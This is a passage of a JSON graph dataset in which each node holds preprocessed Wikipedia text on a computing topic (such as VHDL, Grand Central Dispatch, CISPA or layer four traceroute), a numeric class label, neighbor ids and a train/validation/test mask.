      4723,
      2679,
      4729,
      5251,
      649,
      9868,
      3218,
      9365,
      11413,
      152,
      2206,
      3742,
      9380,
      9381,
      3751,
      172,
      10924,
      686,
      6318,
      6834,
      9909,
      4793,
      7865,
      4797,
      702,
      8386,
      7364,
      9927,
      8905,
      1229,
      5843,
      10461,
      7391,
      3297,
      2797,
      751,
      8432,
      8946,
      3322,
      7426,
      9987,
      3847,
      10005,
      5402,
      5405,
      9511,
      10538,
      7984,
      10035,
      8504,
      2362,
      10748,
      829,
      5437,
      2373,
      2887,
      10058,
      849,
      6993,
      1876,
      2904,
      5978,
      7003,
      5469,
      5470,
      5471,
      5472,
      10589,
      8036,
      871,
      11112,
      361,
      367,
      891,
      6524,
      11647,
      10115,
      6026,
      6541,
      7570,
      5531,
      10144,
      10659,
      933,
      2983,
      9640,
      6577,
      2996,
      10171,
      3006,
      9151,
      9670,
      2509,
      8654,
      8669,
      8670,
      10723,
      10727,
      4074,
      3564,
      4085,
      6651,
      3580,
      4095
    ],
    "mask": "None"
  },
  {
    "node_id": 3753,
    "label": 7,
    "text": "SynfiniWay:synfiniway synfiniway middleware virtualised framework created provides uniform global view resources within department company company suppliers virtualised framework service-oriented meaning applications run services system-independent view applications several applications linked workflow data exchange applications participating workflow implicitly managed framework synfiniway platform-independent allowing almost distributed heterogeneous platform linked virtualised framework virtualised framework implemented synfiniway installing component specific software agents systems framework three major types components synfiniway components based java deployed multi-platform environment example framework two neighbourhoods shown figure adding removing components automatically detected framework synfiniway meta-scheduler automatically adjusts changes service manager service availability synfiniway geared towards service management means application command utilised defined service published synfiniway framework simple complex tasks abstracted services execution using abstracted services user easily run applications commands regardless complex may underlying infrastructure required provide form virtualisation computing resources since user need aware service available run technical business process created linking services workflow workflows synfiniway based wfmc version 1.0 workflow defines one tasks executed given execution logic branch loop conditional synfiniway supports multi-instance tasks run service multiple times concurrently also supports workflow workflows whereby workflow executed task higher level workflow files needed service automatically transferred computer executing service user freed manage file transfers file transfer mechanism used allowing files transferred directly source target computer system going number firewalls source target without stored intermediary systems mechanism uses shortest path transferring files target computer source synfiniway employs meta-scheduling capability optimizing computational workloads combining multiple distributed resource managers organisation using single aggregated view allowing batch jobs directed best location execution using local resource managers lsf pbspro sge loadleveler synfiniway able schedule execute services deployed mixed interlinked set local resource managers",
    "neighbors": [
      4107,
      6797,
      7983,
      9137,
      5492,
      2710,
      823,
      2040,
      3449,
      8122
    ],
    "mask": "Validation"
  },
  {
    "node_id": 3754,
    "label": 5,
    "text": "Arrayed_waveguide_grating:arrayed waveguide grating arrayed waveguide gratings awg commonly used optical de multiplexers wavelength division multiplexed wdm systems devices capable multiplexing large number wavelengths single optical fiber thereby increasing transmission capacity optical networks considerably devices based fundamental principle optics light waves different wavelengths interfere linearly means channel optical communication network makes use light slightly different wavelength light large number channels carried single optical fiber negligible crosstalk channels awgs used multiplex channels several wavelengths onto single optical fiber transmission end also used demultiplexers retrieve individual channels different wavelengths receiving end optical communication network conventional silica-based awgs schematically shown figure planar lightwave circuits fabricated depositing doped undoped layers silica silicon substrate awgs consist number input 1 output 5 couplers free space propagation region 2 4 grating waveguides 3 grating consists large number waveguides constant length increment δl light coupled device via optical fiber 1 connected input port light diffracting input waveguide coupler/slab interface propagates free-space region 2 illuminates grating gaussian distribution wavelength light coupled grating waveguides 3 undergoes constant change phase attributed constant length increment grating waveguides light diffracted waveguide grating interferes constructively gets refocused output waveguides 5 spatial position output channels wavelength dependent array phase shift",
    "neighbors": [
      5321,
      2994,
      10799
    ],
    "mask": "Test"
  },
  {
    "node_id": 3755,
    "label": 4,
    "text": "Layer_four_traceroute:layer four traceroute layer four traceroute lft fast multi-protocol traceroute engine also implements numerous features including number lookups regional internet registries reliable sources loose source routing firewall load balancer detection etc lft best known use network security practitioners trace route destination host many configurations packet-filters firewalls detect network connectivity performance latency problems lft sends various tcp syn fin probes differing van jacobson udp-based method udp probes utilizing ip protocol time live field attempts elicit icmp time_exceeded response gateway along path host lft also listens various tcp udp icmp messages along way assist network managers ascertaining per-protocol heuristic routing information optionally retrieve various information networks traverses operation layer four traceroute described detail several prominent security books codice_1 command first appeared 1998 codice_2 renamed result confusion fast fourier transforms lft stands layer four traceroute results often referred layer four trace",
    "neighbors": [
      5472,
      8998,
      939,
      10924,
      1647,
      11249,
      11250,
      11413,
      5402,
      3967
    ],
    "mask": "Test"
  },
  {
    "node_id": 3756,
    "label": 9,
    "text": "List_of_free_electronics_circuit_simulators:list free electronics circuit simulators electronic circuit simulators distributed free software license available several sources several computing platforms",
    "neighbors": [
      5881,
      7819,
      7820
    ],
    "mask": "Validation"
  },
  {
    "node_id": 3757,
    "label": 7,
    "text": "Infrascale:infrascale infrascale draas disaster-recovery-as-a-service data protection company based el segundo california founded 2011 company headquartered el segundo california offices australia india ukraine 16 datacenters around world including united states canada australia united kingdom india ukraine south africa 2014 company acquired eversync solutions inc offer cloud on-premises backup archiving disaster recovery solutions program received awards various analyst firms publications 2017 redmond channel partners named infrascale best ransomware solution also 2017 gartner named infrascale leader draas magic quadrant 2016 gartner named infrascale visionary disaster recovery magic quadrant 2015 business continuity cool vendor crn named infrascale one 20 coolest cloud storage vendors 2016 cloud 100 features include failover continuous data protection unlimited versioning archiving integrated local backup remote wipe geo-locate military-grade security available direct-to-cloud offering local on-premises appliance january 17 2017 announced partnership google cloud platform deliver faster failover infrascale comes two versions infrascale 100 channel focused concentrates heavily selling resellers managed service providers infrascale products include several features targeted protecting data",
    "neighbors": [
      9184,
      1970,
      6514,
      5492,
      11030,
      823,
      11256,
      3450,
      7515,
      3773
    ],
    "mask": "Test"
  },
  {
    "node_id": 3758,
    "label": 2,
    "text": "SystemStarter:systemstarter systemstarter system program mac os x started mac os x bsd-style init prior mac os x v10.4 launchd mac os x v10.4 later releases starts system processes specified set property lists systemstarter originally written wilfredo sanchez mac os x mac os x v10.4 deprecated favor launchd kept system start system processes yet converted use launchd systemstarter appears removed os x 10.10 later",
    "neighbors": [
      576,
      8877,
      5397,
      4218,
      4571
    ],
    "mask": "None"
  },
  {
    "node_id": 3759,
    "label": 4,
    "text": "Cyber_Intelligence_Sharing_and_Protection_Act:cyber intelligence sharing protection act cyber intelligence sharing protection act cispa 112th congress 113th congress 114th congress proposed law united states would allow sharing internet traffic information u.s. government technology manufacturing companies stated aim bill help u.s. government investigate cyber threats ensure security networks cyberattacks legislation introduced november 30 2011 representative michael rogers r-mi 111 co-sponsors passed house representatives april 26 2012 passed u.s. senate president barack obama advisers argued bill lacks confidentiality civil liberties safeguards white house said would veto february 2013 house reintroduced bill passed united states house representatives april 18 2013 stalled voted upon senate july 10 2014 similar bill cybersecurity information sharing act cisa introduced senate january 2015 house reintroduced bill bill referred committee intelligence february 2 2015 subcommittee crime terrorism homeland security investigations subcommittee constitution civil justice see come house vote december 2015 version cispa hidden total federal budget cispa garnered favor corporations lobbying groups microsoft facebook ibm united states chamber commerce look simple effective means sharing important cyber threat information government however criticized advocates internet privacy civil liberties electronic frontier foundation american civil liberties union free press fight future avaaz.org well various conservative libertarian groups including competitive enterprise institute techfreedom freedomworks americans limited government liberty coalition american conservative union groups argue cispa contains limits government may monitor private individual ’ internet browsing information additionally fear new powers could used spy general public rather pursue malicious hackers critics saw wording included cispa second attempt protect intellectual property stop online piracy act taken table congress met opposition intellectual property theft initially listed bill possible cause sharing web traffic information government though removed subsequent drafts cispa amendment national security act 1947 currently contain provisions pertaining cybercrime adds provisions act describing cyber threat intelligence information possession element intelligence community directly pertaining vulnerability threat system network government private entity including information pertaining protection system network either efforts degrade disrupt destroy system network addition cispa requires director national intelligence establish procedures allow intelligence community elements share cyber threat intelligence private-sector entities encourage sharing intelligence april 16 2012 press release house representatives permanent select committee intelligence announced approval several amendments cispa including addition new provision permit federal lawsuits government violation restrictions placed government ’ use voluntarily shared information including important privacy civil liberties protections contained bill inclusion anti-tasking provision explicitly prohibit government conditioning sharing cyber threat intelligence sharing private sector information government prevention government using information lawful purpose unless government already significant cybersecurity national security purpose using information relevant provisions also clarified focus fact bill designed protect unauthorized access networks systems including unauthorized access aimed stealing private government information addition already collected cyberthreat data also used investigate imminent threat bodily harm individual exploitation minor bringing bill line existing law codified patriot act protect children act two conditions already allow protected entities share data voluntarily united states government law enforcement agencies national center missing exploited children bill sponsors mike rogers dutch ruppersberger chairman ranking member house intelligence committee respectively said april 25 2012 obama administration opposition mostly based lack critical infrastructure regulation something outside jurisdiction intelligence committee also since introduced package amendments legislation address nearly every single one criticisms leveled administration particularly regarding privacy civil liberties americans due opposition bill experienced co-sponsors planning amend bill address many concerns opponents—including limiting scope narrower definition cyber-threats stating theft intellectual property refers theft research development addition penalties private companies government uses data cispa purposes unrelated cyberthreats however sharan bradford franklin constitution project states although appreciate intelligence committee efforts improve bill willingness engage dialogue privacy advocates changes current draft come close addressing civil liberties threats posed bill proposals would actually make cispa worse therefore congress pass cispa rainey reitman electronic frontier foundation states date authors bill unresponsive criticisms offering amendments largely cosmetic dismissing grave concerns bill could undermine core privacy rights everyday internet users rep. mike rogers characterized growing protests cispa 'turbulence vowed push floor vote without radical changes kendall burman center democracy technology states authors cispa made positive changes recently unfortunately none changes gets heart privacy concerns internet users advocacy groups expressed april 2012 office management budget executive office president united states released statement strongly opposing current bill recommending veto april 26 2012 house representatives passed cispa february 13 2013 united states representative mike rogers reintroduced cispa bill 113th congress h.r 624 april 18 2013 house representatives passed h.r 624 senate reportedly refused vote measure drafting competing legislation july 10 2014 similar bill cybersecurity information sharing act cisa introduced senate full list seen house.gov site full list seen house.gov site cispa supported several trade groups containing eight hundred private companies including business software alliance ctia – wireless association information technology industry council internet security alliance national cable telecommunications association national defense industrial association techamerica united states chamber commerce addition individual major telecommunications information technology companies like ibm intel oracle corporation symantec verizon google taken public position bill shown previous support says support idea believe bill needs work leading google yahoo microsoft executives also executive council technet tech trade group sent letter supporting cispa april 2013 dubbed stop cyber spying week starting april 16 2012 many civil liberties groups advocates raised awareness cispa twitter campaign hash-tags cispa congresstmi including limited constitution project american civil liberties union electronic frontier foundation center democracy technology demand progress fight future free press reporters without borders sunlight foundation techfreedom anonymous hacktivist group criticized bill called internet blackout day protest bill date blackout april 22 2013 since legislation must pass house senate within congress anything introduced 112th earlier congresses pass chambers",
    "neighbors": [
      9569,
      4168,
      5002,
      7887,
      7345,
      5780,
      5078,
      150,
      3323
    ],
    "mask": "Test"
  },
  {
    "node_id": 3760,
    "label": 6,
    "text": "Drive_Letter_Access:drive letter access drive letter access dla discontinued commercial packet writing application microsoft windows operating system allows optical disc data storage devices used manner similar floppy disks dla packet writing technology cd dvd media uses udf file system dla compatible windows vista newer although patch exists fix issue windows vista roxio burn introduced april 30 2009 replacement dla remedies compatibility issues internet explorer 8 dla originally developed veritas software later sold sonic solutions 2002 common shipped majority cd dvd recording drives dla came custom oem version branded drive also pc systems dell hp ibm sony toshiba came dla pre-installed oem version often available download specific computer system windows vista support dla either dropped replaced similar product like drag-to-disc use optical medium cd-r cd-rw dvd±r dvd±rw like floppy drive necessary utilize technique called packet writing formatting optical media possible write data small packets hence name “ packet writing. ” optical drive unit support ability write small units modern cd dvd recording drives way possible save files onto optical media well change rename delete copy files separately onto media without packet writing optical media like above-mentioned would written one big block like disc dao session sao track tao media types normally support sectors formatting packet writing medium sectored blocks written individually preferred file system universal disk format udf versions 1.50 onward also used dla packet writing required writing dvd-ram dvd-ram media already sectored seen looking surface empty dvd-ram disc hardware logic dvd-ram capable drives supports sectored read/write operations required dvd-ram standard however windows 2000 dla also add support dvd-ram together udf file system windows xp dla add udf support dla also supports mount rainier standard mrw capable drives windows xp dla provide functionality well udf support windows xp first windows operating system support dvd-ram windows vista first windows operating system support full udf functionality udf version 2.50 full support meaning read write operations mount rainier dla available microsoft windows operating systems english language note oem versions officially support windows 2000 xp however dla also runs older versions windows like windows 98 second edition windows well windows nt 4.0 patch required windows vista compatibility works retail trial version one exception dell oem version instead patching dla simply install drag-to-disc replacement techniques used dla competing applications",
    "neighbors": [
      7713,
      9762,
      5384,
      5612,
      6797,
      6062,
      7342,
      7983,
      10476,
      7379,
      5397,
      1400,
      3323
    ],
    "mask": "Test"
  },
  {
    "node_id": 3761,
    "label": 9,
    "text": "Nashorn_(JavaScript_engine):nashorn javascript engine nashorn javascript engine developed java programming language oracle based da vinci machine jsr 292 released java 8 project announced first jvm language summit july 2011 confirmed javaone october 2011 november 21 2012 oracle formally announced open sourcing nashorn source openjdk repository project aim allow embedding javascript java applications via jsr-223 develop standalone javascript applications december 21 2012 oracle announced nashorn source publicly released openjdk repository release java 11 nashorn deprecated likely removed jdk later time graalvm suggested replacement nashorn nahss-horn german translation rhinoceros play words rhino name javascript engine implemented java provided mozilla foundation latter gets name animal cover javascript book o'reilly media according oracle benchmarks nashorn performance several orders magnitude faster alternative rhino javascript engine",
    "neighbors": [
      1409,
      259,
      3462,
      6791,
      10507,
      8854,
      11670,
      4378,
      8605,
      7455,
      803,
      5677,
      7983,
      11060,
      438,
      10684,
      5311,
      2880,
      7871,
      6338,
      9152,
      4171,
      11087,
      339,
      84,
      4822,
      4056,
      9560,
      603,
      220,
      482,
      5219,
      7396,
      487,
      5483,
      5612,
      9195,
      10991,
      10097,
      6143
    ],
    "mask": "Test"
  },
  {
    "node_id": 3762,
    "label": 9,
    "text": "VHDL:vhdl vhdl vhsic-hdl high speed integrated circuit hardware description language hardware description language used electronic design automation describe digital mixed-signal systems field-programmable gate arrays integrated circuits vhdl also used general purpose parallel programming language starting 1983 vhdl originally developed behest u.s department defense order document behavior asics supplier companies including equipment standard mil-std-454n requirement 64 section 4.5.1 asic documentation vhdl explicitly requires documentation microelectronic devices vhdl idea able simulate asics information documentation obviously attractive logic simulators developed could read vhdl files next step development logic synthesis tools read vhdl output definition physical implementation circuit due department defense requiring much syntax possible based ada order avoid re-inventing concepts already thoroughly tested development ada vhdl borrows heavily ada programming language concepts syntax initial version vhdl designed ieee standard ieee 1076-1987 included wide range data types including numerical integer real logical bit boolean character time plus arrays codice_1 called codice_2 codice_3 called string problem solved edition however multi-valued logic signal drive strength none weak strong unknown values also considered required ieee standard 1164 defined 9-value logic types scalar codice_4 vector version codice_5 resolved subtype codice_6 parent type codice_4 typed signals allow multiple driving modeling bus structures whereby connected resolution function handles conflicting assignments adequately updated ieee 1076 1993 made syntax consistent allowed flexibility naming extended codice_3 type allow iso-8859-1 printable characters added codice_9 operator etc minor changes standard 2000 2002 added idea protected types similar concept class c++ removed restrictions port mapping rules addition ieee standard 1164 several child standards introduced extend functionality language ieee standard 1076.2 added better handling real complex data types ieee standard 1076.3 introduced signed unsigned types facilitate arithmetical operations vectors ieee standard 1076.1 known vhdl-ams provided analog mixed-signal circuit design extensions standards support wider use vhdl notably vital vhdl initiative towards asic libraries microwave circuit design extensions june 2006 vhdl technical committee accellera delegated ieee work next update standard approved called draft 3.0 vhdl-2006 maintaining full compatibility older versions proposed standard provides numerous extensions make writing managing vhdl code easier key changes include incorporation child standards 1164 1076.2 1076.3 main 1076 standard extended set operators flexible syntax case generate statements incorporation vhpi vhdl procedural interface interface c/c++ languages subset psl property specification language changes improve quality synthesizable vhdl code make testbenches flexible allow wider use vhdl system-level descriptions february 2008 accellera approved vhdl 4.0 also informally known vhdl 2008 addressed 90 issues discovered trial period version 3.0 includes enhanced generic types 2008 accellera released vhdl 4.0 ieee balloting inclusion ieee 1076-2008 vhdl standard ieee 1076-2008 published january 2009 ieee standard 1076 defines vhsic hardware description language vhdl originally developed contract f33615-83-c-1003 united states air force awarded 1983 team intermetrics inc. language experts prime contractor texas instruments chip design experts ibm computer system design experts language undergone numerous revisions variety sub-standards associated augment extend important ways 1076 continues milestone design electronic systems vhdl commonly used write text models describe logic circuit model processed synthesis program part logic design simulation program used test logic design using simulation models represent logic circuits interface design collection simulation models commonly called testbench vhdl simulator typically event-driven simulator means transaction added event queue specific scheduled time e.g signal assignment occur 1 nanosecond event added queue time +1ns zero delay also allowed still needs scheduled cases delta delay used represent infinitely small time step simulation alters two modes statement execution triggered statements evaluated event processing events queue processed vhdl constructs handle parallelism inherent hardware designs constructs processes differ syntax parallel constructs ada tasks like ada vhdl strongly typed case sensitive order directly represent operations common hardware many features vhdl found ada extended set boolean operators including nand vhdl file input output capabilities used general-purpose language text processing files commonly used simulation testbench stimulus verification data vhdl compilers build executable binaries case might possible use vhdl write testbench verify functionality design using files host computer define stimuli interact user compare results expected however designers leave job simulator relatively easy inexperienced developer produce code simulates successfully synthesized real device large practical one particular pitfall accidental production transparent latches rather d-type flip-flops storage elements one design hardware vhdl ide fpga implementation xilinx ise altera quartus synopsys synplify mentor graphics hdl designer produce rtl schematic desired circuit generated schematic verified using simulation software shows waveforms inputs outputs circuit generating appropriate testbench generate appropriate testbench particular circuit vhdl code inputs defined correctly example clock input loop process iterative statement required final point vhdl model translated gates wires mapped onto programmable logic device cpld fpga actual hardware configured rather vhdl code executed form processor chip key advantage vhdl used systems design allows behavior required system described modeled verified simulated synthesis tools translate design real hardware gates wires another benefit vhdl allows description concurrent system vhdl dataflow language unlike procedural computing languages basic c assembly code run sequentially one instruction time vhdl project multipurpose created calculation block used many projects however many formational functional block parameters tuned capacity parameters memory size element base block composition interconnection structure vhdl project portable created one element base computing device project ported another element base example vlsi various technologies big advantage vhdl compared original verilog vhdl full type system designers use type system write much structured code especially declaring record types vhdl design consists minimum entity describes interface architecture contains actual implementation addition designs import library modules designs also contain multiple architectures configurations simple gate vhdl would look something like notice codice_10 stands register transfer level design example may seem verbose hdl beginners many parts either optional need written generally simple functions like part larger behavioral module instead separate module something simple addition use elements codice_4 type might first seem overkill one could easily use built-in codice_1 type avoid library import beginning however using 9-valued logic codice_13 codice_14 codice_15 codice_16 codice_17 codice_18 codice_19 codice_20 codice_21 instead simple bits 0,1 offers powerful simulation debugging tool designer currently exist hdl examples follow see vhdl code written compact form however experienced designers usually avoid compact forms use verbose coding style sake readability maintainability another advantage verbose coding style smaller amount resources used programming programmable logic device cpld vhdl frequently used two different goals simulation electronic designs synthesis designs synthesis process vhdl compiled mapped implementation technology fpga asic many fpga vendors free inexpensive tools synthesize vhdl use chips asic tools often expensive constructs vhdl suitable synthesis example constructs explicitly deal timing codice_22 synthesizable despite valid simulation different synthesis tools different capabilities exists common synthesizable subset vhdl defines language constructs idioms map common hardware many synthesis tools ieee 1076.6 defines subset language considered official synthesis subset generally considered best practice write idiomatic code synthesis results incorrect suboptimal non-standard constructs multiplexer 'mux usually called simple construct common hardware design example demonstrates simple two one mux inputs codice_23 codice_24 selector codice_25 output codice_14 note many ways express mux vhdl transparent latch basically one bit memory updated enable signal raised many ways expressed vhdl d-type flip-flop samples incoming signal rising falling edge clock example asynchronous active-high reset samples rising clock edge another common way write edge-triggered behavior vhdl 'event signal attribute single apostrophe written signal name name attribute vhdl also lends one-liners useful signals registers driven process reset following example up-counter asynchronous reset parallel load configurable width demonstrates use 'unsigned type type conversions 'unsigned 'std_logic_vector vhdl generics generics close arguments templates traditional programming languages like c++ complex counters may add if/then/else statements within codice_27 add functions count enables stopping rolling count value generating output signals like terminal count signals etc care must taken ordering nesting controls used together order produce desired priorities minimize number logic levels needed large subset vhdl translated hardware subset known non-synthesizable simulation-only subset vhdl used prototyping simulation debugging example following code generate clock frequency 50 mhz example used drive clock input design simulation however simulation-only construct implemented hardware actual hardware clock generated externally scaled internally user logic dedicated hardware simulation-only constructs used build complex waveforms short time waveform used example test vectors complex design prototype synthesizer logic implemented future commercial",
    "neighbors": [
      9345,
      6403,
      8708,
      7045,
      5768,
      7049,
      9224,
      7819,
      398,
      1298,
      2450,
      5270,
      9371,
      4773,
      5671,
      4777,
      682,
      6187,
      428,
      4396,
      3886,
      1967,
      2224,
      6904,
      434,
      9006,
      692,
      6197,
      11321,
      6716,
      8508,
      2623,
      5439,
      963,
      3780,
      11333,
      8262,
      3788,
      8524,
      8788,
      11221,
      3159,
      10332,
      6239,
      11487,
      4581,
      5861,
      5863,
      8554,
      5355,
      10474,
      10734,
      4465,
      11125,
      1399,
      1016,
      3323,
      8828,
      1917,
      3838
    ],
    "mask": "Test"
  },
  {
    "node_id": 3763,
    "label": 1,
    "text": "Comparison_of_object-relational_mapping_software:comparison object-relational mapping software table shows comparison notable orm software products currently available",
    "neighbors": [
      3712,
      9729,
      3080,
      1034,
      10250,
      2063,
      7074,
      7475,
      7742,
      2631,
      11338,
      6860,
      10573,
      4944,
      7518,
      9320,
      8554,
      5612,
      3821,
      9467,
      3710
    ],
    "mask": "Test"
  },
  {
    "node_id": 3764,
    "label": 3,
    "text": "Xsgi:xsgi xsgi silicon graphics sgi implementation x window system x11 server irix-based graphical workstations servers xsgi released 1991 irix 4.0 sgi indigo workstation work xsgi began may 1989 tom paquin left ibm join sgi integrate x window system sgi iris gl interface paquin recruited set software engineers experienced x server implementation jeff weinstein erik fortune paul shupak john giannandrea peter daifuku michael toy todd newman spence murray dave spalding graphics hardware designed silicon graphics provided accelerated rendering access graphics hardware commands rather memory-mapped framebuffers manipulated cpu made monochrome framebuffer mfb color framebuffer cfb device-dependent rendering layers supplied mit x11 sampler server inappropriate silicon graphics hardware jeff weinstein developed framebuffer nfb device-dependent rendering layer support silicon graphics style hardware access sco later incorporated nfb layer x server porting layer silicon graphics hardware included overlay planes provide hardware overlay initial efforts todd newman implement overlay plane support xsgi eventually led peter daifuku fully functional support overlay planes daifuku separated notion window visibility clipping region window renderable clipping region previously mit x sample server treated two clipping regions identical region xsgi advertises overlay planes x11 visuals overlay characteristics described server_overlay_visuals convention erik fortune developed x keyboard extension xkb xsgi xsgi supported x11 iris gl opengl display postscript pex phigs rendering models",
    "neighbors": [
      5380,
      9223,
      5898,
      7309,
      7311,
      5523,
      2581,
      5272,
      429,
      11447,
      7234,
      10051,
      6858,
      9932,
      5076,
      7001,
      221,
      11485,
      6243,
      8682,
      5867,
      1644,
      5356,
      1398,
      3323,
      1149
    ],
    "mask": "None"
  },
  {
    "node_id": 3765,
    "label": 9,
    "text": "Comparison_of_ALGOL_68_and_C++:comparison algol 68 c++ c++ n't algol 68 n't assigning values a68 codice_1 variable automatic type tagged variable pulling value back syntactically awkward conformity-clause required algol 68 example c/c++ example net effect type-tagging algol68 strong typing half encroaches codice_1 new mode type may declared using codice_3 declaration similar effect following c++ code const int max=99 typedef struct newtype 9+1 max+1 note algol 68 newtype name appears left equality notably construction made read left right without regard priorities",
    "neighbors": [
      5896,
      1931,
      6414,
      10510,
      6160,
      5521,
      3736,
      155,
      5796,
      5806,
      9008,
      7479,
      10043,
      10684,
      963,
      5961,
      1610,
      1611,
      9804,
      8397,
      11212,
      11219,
      5588,
      7894,
      4057,
      10586,
      4069,
      7274,
      6640,
      1016,
      3577
    ],
    "mask": "Test"
  },
  {
    "node_id": 3766,
    "label": 2,
    "text": "Grand_Central_Dispatch:grand central dispatch grand central dispatch gcd technology developed apple inc. optimize application support systems multi-core processors symmetric multiprocessing systems implementation task parallelism based thread pool pattern fundamental idea move management thread pool hands developer closer operating system developer injects work packages pool oblivious pool architecture model improves simplicity portability performance gcd first released mac os x 10.6 also available ios 4 name grand central dispatch reference grand central terminal source code library provides implementation gcd services libdispatch released apple apache license september 10 2009 ported freebsd operating system starting freebsd 8.1 midnightbsd 0.3-current includes libdispatch without blocks support linux solaris support provided within upstream trunk order develop support windows currently two forks exist opensource.mlba-team.de github apple port libdispatch.dll windows shipped safari itunes sdk provided gcd works allowing specific tasks program run parallel queued execution depending availability processing resources scheduling execute available processor cores referred routing apple task expressed either function block blocks extension syntax c c++ objective-c programming languages encapsulate code data single object way similar closure gcd still used environments blocks available grand central dispatch still uses threads low level abstracts away programmer need concerned many details tasks gcd lightweight create queue apple states 15 instructions required queue work unit gcd creating traditional thread could easily require several hundred instructions task grand central dispatch used either create work item placed queue assign event source task assigned event source work unit made block function event triggers work unit placed appropriate queue described apple efficient creating thread whose sole purpose wait single event triggering dispatch framework declares several data types functions create manipulate two examples demonstrate use grand central dispatch found john siracusa ars technica snow leopard review initially document-based application method called codice_1 may something like count number words paragraphs document normally would quick process may executed main thread without user noticing delay pressing button results showing document large analysis takes long time execute main thread wait function finish takes long enough user notice application may even beachball solution seen call codice_2 placed inside block placed one global concurrent queues finished running codice_2 new block placed main queue main thread application runs updates gui necessary gui updated main thread making two small changes developer avoided potential stall application seen user allowed application make better use hardware resources second example parallelising loop code runs codice_4 function codice_5 times assigning result element array codice_6 calls summarize array loop ended unfortunately work computed sequentially may need assuming do_work n't rely results calls made reason calls made concurrently would done gcd codice_7 runs block passed codice_5 times placing invocation global queue passing block invocation different number 0 codice_5-1 allow os spread work sees fit choosing optimal number threads run current hardware system load codice_7 return blocks places given queue completed execution guaranteed work inside original loop completed calling codice_11 programmers create serial queues tasks know must run serially may executed separate thread new queue would created like care must taken avoid dispatched block queue synchronously placing another block queue guaranteed deadlock code might following gcd used throughout macos beginning 10.6 snow leopard apple encouraged adoption macos application developers freebsd developer robert watson announced first adaptation major open source application apache http server use gcd via apache gcd mpm multi-processing module may 11 2010 order illustrate programming model integrate gcd existing large-scale multi-threaded applications announcement observed gcd mpm one third half number lines threaded mpms gcd implemented libdispatch support pthreads non-posix extensions developed apple apple changed interface since inception os x 10.5 official launch gcd 10.6 mountain lion 10.8 recently mavericks 10.9 latest changes involve making code supporting pthreads user mode kernel private kernel pthread support reduced shims actual implementation moved separate kernel extension",
    "neighbors": [
      4615,
      2571,
      5647,
      1042,
      6700,
      4657,
      1074,
      9802,
      5713,
      7249,
      3670,
      4184,
      2141,
      4702,
      2149,
      8303,
      6771,
      2676,
      9343,
      3719,
      10888,
      11402,
      8852,
      1686,
      7318,
      3228,
      6813,
      2207,
      1699,
      5292,
      8877,
      1710,
      2232,
      9912,
      9406,
      1729,
      6849,
      713,
      9418,
      3790,
      9430,
      10455,
      3289,
      4318,
      10470,
      231,
      9451,
      2288,
      7928,
      8441,
      7422,
      11521,
      2819,
      1796,
      10512,
      4888,
      11037,
      811,
      3371,
      7983,
      10036,
      9529,
      4933,
      9035,
      1878,
      865,
      4457,
      9100,
      9109,
      1439,
      6093,
      7118,
      3035,
      4571,
      4068,
      5093,
      487,
      10221,
      5619,
      11257,
      7163,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 3767,
    "label": 9,
    "text": "Value_(computer_science):value computer science computer science value representation entity manipulated program members type values type value variable given corresponding mapping environment languages assignable variables becomes necessary distinguish r-value contents l-value location variable declarative high-level languages values referentially transparent means resulting value independent location sub- expression needed compute value stored contents location bits whether 1 0 interpretation significant languages use idea l-values r-values deriving typical mode evaluation left right hand side assignment statement l-value refers object persists beyond single expression r-value temporary value persist beyond expression uses notion l-values r-values introduced combined programming language cpl notions expression r-value l-value r-value/l-value analogous parameter modes input parameter value output parameter assigned input/output parameter value assigned though technical details differ contexts languages many languages notably c family l-values storage addresses programmatically accessible running program e.g. via address-of operator like c/c++ meaning variables dereferenced references certain memory location r-values l-values see non-l-values—a term used distinguish l-values consider c expression executed computer generates integer value 13 program explicitly designated computer 13 stored expression non l-value hand c program declares variable x assigns value 13 x expression value 13 l-value c term l-value originally meant something could assigned hence name indicating left side assignment operator since reserved word constant added language term 'modifiable l-value c++11 special semantic-glyph exists denote use/access expression address compiler i.e. address retrieved using address-of operator run-time program see use move semantics type reference applied r-values including non-l-values well l-values processors provide one instructions take immediate value sometimes referred immediate short immediate value stored part instruction employs usually load add subtract register parts instruction opcode destination latter may implicit non-immediate value may reside register stored elsewhere memory requiring instruction contain direct indirect address e.g. index register address value l-value expression designates refers object non-modifiable l-value addressable assignable modifiable l-value allows designated object changed well examined r-value expression non-l-value expression l-value one example immediate value look consequently addressable.. value virtually kind data given data type instance string digit single letter processors often support one size immediate data e.g 8 16 bit employing unique opcode mnemonic instruction variant programmer supplies data value fit assembler issues range error message assemblers allow immediate value expressed ascii decimal hexadecimal octal binary data thus ascii character byte order strings may differ processors depending assembler computer architecture",
    "neighbors": [
      128,
      3462,
      655,
      6160,
      10145,
      6821,
      1830,
      7847,
      9397,
      3642,
      10555,
      9794,
      10571,
      7756,
      5456,
      5585,
      10581,
      11610,
      4572,
      6239,
      3435,
      240,
      372,
      2804,
      3577,
      380,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 3768,
    "label": 1,
    "text": "Database_refactoring:database refactoring database refactoring simple change database schema improves design retaining behavioral informational semantics database refactoring change way data interpreted used fix bugs add new functionality every refactoring database leaves system working state thus causing maintenance lags provided meaningful data exists production environment database refactoring conceptually difficult code refactoring code refactorings need maintain behavioral semantics database refactorings also must maintain informational semantics refactor database schema one several reasons examples database refactoring process database refactoring act applying database refactorings evolve existing database schema database refactoring core practice evolutionary database design three considerations need taken account",
    "neighbors": [
      2688,
      9481,
      10505,
      10258,
      10518,
      4376,
      9112,
      7968,
      290,
      1314,
      7461,
      8742,
      5550,
      5808,
      10418,
      9527,
      3004,
      9661,
      9663,
      4416,
      2369,
      5441,
      11457,
      8518,
      72,
      853,
      2901,
      4183,
      9942,
      9177,
      987,
      860,
      9183,
      11362,
      10471,
      8808,
      6383,
      7157,
      9079,
      2681,
      9467
    ],
    "mask": "Train"
  },
  {
    "node_id": 3769,
    "label": 3,
